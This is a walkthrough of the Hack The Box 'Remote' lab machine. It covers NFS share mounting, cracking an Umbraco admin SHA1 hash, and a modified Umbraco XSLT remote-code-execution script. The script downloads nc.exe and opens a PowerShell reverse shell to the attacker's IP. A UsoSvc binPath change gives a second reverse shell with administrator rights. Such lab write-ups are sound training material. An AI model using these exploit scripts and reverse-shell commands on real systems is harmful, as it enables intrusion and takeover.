Posts Hackthebox Remote writeup
Post
Cancel

Hackthebox Remote writeup

information@remote:~$

ColumnDetails
NameRemote
Points20
OsWindows
Difficultyeasy
Creatormrb3n
Out On21 march 2020
creator’s Twitter@mrb3n813

Brief@remote:~$

An easy box start with Mounting the NFS and got a sfd file which contains a hash and cracking it with john and logged in to umbraco and after searching an exploit for it got a RCE and shell as user , abusing service uSoSvc got shell as administrator.

Summary

  • mounting the nfs.
  • Getting the .sdf file
  • Reading contents of file and Cracking the password hash using john
  • Getting the login page for the umbraco application
  • Finding the exploit and modifying it to for rce
  • Getting shell as apppool\defaultapppool
  • Getting user.txt
  • Absuing the uSoSvc service
  • Getting shell as administrator
  • Getting root.txt

Rooted

Got root

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
Nmap 7.80 scan initiated Sun Mar 22 07:12:43 2020 as: nmap -sV -sC -p- -T4 -oA nmap 10.10.10.180
Warning: 10.10.10.180 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.180
Host is up (0.33s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3h32m11s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-22T02:19:40
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 22 07:49:25 2020 -- 1 IP address (1 host up) scanned in 2202.16 seconds

So many ports are opened Lets Start with port 80

port 80

port-80

So After wasting my time on port 80 i decided to run gobuster on it And while the gobutser is running lets move on to next port

gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➜  remote git:(master) ✗ gobuster dir -u remote.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://remote.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/22 16:45:11 Starting gobuster
===============================================================
/contact (Status: 200)
/blog (Status: 200)
/products (Status: 200)
/home (Status: 200)
/people (Status: 200)
/Home (Status: 200)
/Products (Status: 200)
/Contact (Status: 200)
/install (Status: 302)

The dir /install looked very interesting When i visited it ,I was redirected to a login page Cool

Login page

Port 111 (Rpcbind)

The nfs Network File System Service is ruuning on the port and we can use a utility called showmount from the tool nfs-common and you can simply install it with

1
apt install nfs-common

Now i can list the storage available on nfs

1
2
3
➜  remote git:(master) ✗ showmount -e remote.htb             
Export list for remote.htb:
/site_backups (everyone)

So i got a site_backup dir which is available for everyone cool !! Now i will mount this dir to my machine to read and transfer contents from it

1
mkdir mnt && mount -t nfs remote.htb:/site_backups ./mnt

This will mount the site_backups dir to my mnt dir that i had created

1
drwxr-xr-x  2 root root    4096 Mar 22 08:12 mnt

Simply move to it And can check the files and its content

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜  mnt ls -la
total 123
drwx------ 2 nobody 4294967294  4096 Feb 24 03:35 .
drwxr-xr-x 3 root   root        4096 Mar 22 17:59 ..
drwx------ 2 nobody 4294967294    64 Feb 21 02:16 App_Browsers
drwx------ 2 nobody 4294967294  4096 Feb 21 02:17 App_Data
drwx------ 2 nobody 4294967294  4096 Feb 21 02:16 App_Plugins
drwx------ 2 nobody 4294967294    64 Feb 21 02:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 21 02:16 bin
drwx------ 2 nobody 4294967294  8192 Feb 21 02:16 Config
drwx------ 2 nobody 4294967294    64 Feb 21 02:16 css
-rwx------ 1 nobody 4294967294   152 Nov  2  2018 default.aspx
-rwx------ 1 nobody 4294967294    89 Nov  2  2018 Global.asax
drwx------ 2 nobody 4294967294  4096 Feb 21 02:16 Media
drwx------ 2 nobody 4294967294    64 Feb 21 02:16 scripts
drwx------ 2 nobody 4294967294  8192 Feb 21 02:16 Umbraco
drwx------ 2 nobody 4294967294  4096 Feb 21 02:16 Umbraco_Client
drwx------ 2 nobody 4294967294  4096 Feb 21 02:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 14:57 Web.config

After spending <= 15 mins i got a file called Umbraco.sdf

1
2
3
4
5
6
7
8
9
10
11
➜  App_Data ls -la
total 1977
drwx------ 2 nobody 4294967294    4096 Feb 21 02:17 .
drwx------ 2 nobody 4294967294    4096 Feb 24 03:35 ..
drwx------ 2 nobody 4294967294      64 Feb 21 02:16 cache
drwx------ 2 nobody 4294967294    4096 Feb 21 02:16 Logs
drwx------ 2 nobody 4294967294    4096 Feb 21 02:16 Models
drwx------ 2 nobody 4294967294      64 Feb 21 02:16 packages
drwx------ 2 nobody 4294967294    4096 Feb 21 02:16 TEMP
-rwx------ 1 nobody 4294967294   36832 Feb 20 15:59 umbraco.config
-rwx------ 1 nobody 4294967294 1965978 Feb 20 15:05 Umbraco.sdf

I searched for any online sdf file viewer but didnt find any !!

So i opened it via it my visual studio code and got a line in the file at the top

1
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}

It doesnt took me much time to get and identify the sha1 hash starting after admin@htb.local

b8be16afba8c314ad33d812f22a04991b90e2aaa

I confirmed the hash via hash-identifier

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜  prashant git:(master) ✗ hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: b8be16afba8c314ad33d812f22a04991b90e2aaa

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Cracking Hash

Now i copied the hash in a file hash.txt and next step is to crack it via john

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜  remote git:(master) ✗ john hash.txt -w=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 XOP 4x2])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)
1g 0:00:00:02 DONE (2020-03-22 18:18) 0.4545g/s 4465Kp/s 4465Kc/s 4465KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

We got it Cracked baconandcheese

Now we can login using admin@htb.local and baconandcheese

Login as admin

admin-panel

Now before doing something i decided to find any exploit for the Umbraco version 7.12.4

And yes i got a possible exploit

https://www.exploit-db.com/exploits/46153

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):
    print(dico.items());
    
print("Start");

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "XXXX";
password="XXXX";
host = "XXXX";


s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);


url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);


url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};


r4 = s.post(url_xslt,data=data,headers=headers);

print("End");

But we need to configure it according to our requirements

I changed the following things in the script

  • login = “admin@htb.local”

  • password = “baconandcheese”

  • host = “http://remote.htb”

  • string cmd = “mkdir /tmp;iwr -uri http://10.10.15.107:8080/nc.exe -outfile /tmp/nc.exe;/tmp/nc.exe 10.10.15.107 2345 -e powershell”

  • proc.StartInfo.FileName = “powershell.exe”

And after changing everything here is my final script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):
    print(dico.items());
    
print("Start");

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "mkdir /tmp;iwr -uri http://10.10.15.107:8080/nc.exe -outfile /tmp/nc.exe;/tmp/nc.exe 10.10.15.107 2345 -e powershell"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://remote.htb";


s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);


url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);


url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};


r4 = s.post(url_xslt,data=data,headers=headers);

print("End");

Exploiting the umbraco

I started my python server on port 8080 and a nc listner on port 2345

And ran the script

1
2
3
➜  remote git:(master) ✗ python exploit.py
Start
[]

Python server go hitted

1
2
3
➜  Tools git:(master) ✗ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.180 - - [22/Mar/2020 18:39:27] "GET /nc.exe HTTP/1.1" 200 -

And got a shell on nc

1
2
3
4
5
6
7
➜  prashant git:(master) ✗ nc -nlvp 2345
listening on [any] 2345 ...
connect to [10.10.15.107] from (UNKNOWN) [10.10.10.180] 49684
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

The flag was in public user dir this time

Got user.txt

1
2
3
4
PS C:\users\public> cat user.txt
cat user.txt
496--------------------------692
PS C:\users\public> 

Privilege escalation to root

After looking into available dirs i ran winPEAS.exe after transfering it to the machine

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\tmp> iwr -uri http://10.10.15.107:8080/winPEAS.exe -outfile winpeas.exe
iwr -uri http://10.10.15.107:8080/winPEAS.exe -outfile winpeas.exe
PS C:\tmp> ls
ls


    Directory: C:\tmp


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        3/22/2020   9:16 AM          61440 nc.exe                                                                
-a----        3/22/2020   9:20 AM         227840 winpeas.exe                                                           

Now i can ran it And i got an interesting service that is running and i have permission to modify it

1
2
3
4
  [+] Modifiable Services(T1007)
   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
    UsoSvc: AllAccess

The service is UsoSvc

I found an awesome way to exploit the service on PayloadAllTheThings

Exploiting the UsoSvc service

I just need to add the binpath of the service with the nc reverse shell and stop the service and start it again

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\windows\system32\inetsrv> sc.exe config usosvc binPath="C:\tmp\nc.exe 10.10.15.107 4444 -e powershell.exe"
sc.exe config usosvc binPath="C:\tmp\nc.exe 10.10.15.107 4444 -e powershell.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\windows\system32\inetsrv> sc.exe stop usosvc
sc.exe stop usosvc

SERVICE_NAME: usosvc 
        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530
PS C:\windows\system32\inetsrv> sc.exe start usosvc
sc.exe start usosvc


I looked at my listener And i got a connection back

Got root.txt

1
2
3
4
5
6
7
8
9
10
11
  prashant git:(master)  nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.15.107] from (UNKNOWN) [10.10.10.180] 49691
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> type C:\users\Administrator\Desktop\root.txt
type C:\users\Administrator\Desktop\root.txt
8e3---------------------------9ef1
PS C:\Windows\system32> 

And we got root flag

Thanks for reading, a single feedback will be appreciated !!!

Updated Sep 5, 2020 2020-09-05T15:40:23+00:00
This post is licensed under CC BY 4.0

© 2020 Prashant Saini. All rights reserved.